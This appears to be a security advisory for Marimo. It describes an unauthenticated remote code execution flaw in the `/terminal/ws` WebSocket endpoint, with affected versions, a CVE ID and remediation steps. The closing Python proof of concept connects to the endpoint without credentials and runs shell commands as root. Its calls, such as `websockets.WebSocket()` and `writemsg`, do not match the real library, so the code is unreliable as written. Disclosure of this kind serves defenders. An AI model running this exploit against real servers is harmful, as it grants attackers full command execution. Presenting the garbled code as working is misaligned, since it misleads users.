### Key Vulnerability Summary **Vulnerability Overview** The `/terminal/ws` terminal WebSocket endpoint in Marimo contains a pre-authentication Remote Code Execution (RCE) vulnerability. This endpoint lacks authentication validation, allowing unauthenticated attackers to connect directly and obtain a full PTY shell, thereby executing arbitrary system commands on the server. Unlike other WebSocket endpoints, this endpoint only checks the running mode and completely bypasses the authentication step. **Scope of Impact** * **Affected Versions**: Marimo <= 0.20.4 * **CVE ID**: CVE-2025-39587 **Remediation** 1. Add authentication validation to the `/terminal/ws` endpoint to align it with the `/ws` endpoint (using `WebSocketConnectionValidator.validate_auth()`). 2. Apply a unified authentication decorator or middleware interceptor to all WebSocket endpoints. 3. The terminal functionality should only be available when explicitly enabled, rather than being enabled by default. **Proof of Concept (PoC) Code** ```python import websockets import time # Connect without any authentication ws = websockets.WebSocket() ws.connect('ws://TARGET:2718/terminal/ws') time.sleep(2) # Drain initial output try: while True: ws.writemsg(1) ws.recv() except: pass # Execute arbitrary command ws.writemsg(10) ws.send('id\n') time.sleep(2) print(ws.recv()) # uid=0(root) gid=0(root) groups=0(root) ws.close() ```